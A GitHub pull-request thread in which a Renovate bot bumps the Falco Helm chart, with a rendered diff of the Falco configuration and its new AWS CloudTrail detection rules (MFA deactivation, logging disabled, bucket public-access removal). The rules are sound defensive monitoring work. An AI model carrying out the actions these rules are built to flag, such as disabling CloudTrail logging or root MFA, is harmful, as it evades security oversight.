-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.1 chore(deps): update helm release falco to v1.19.2 Jun 13, 2022
@github-actions
Copy link
Contributor

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.2

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
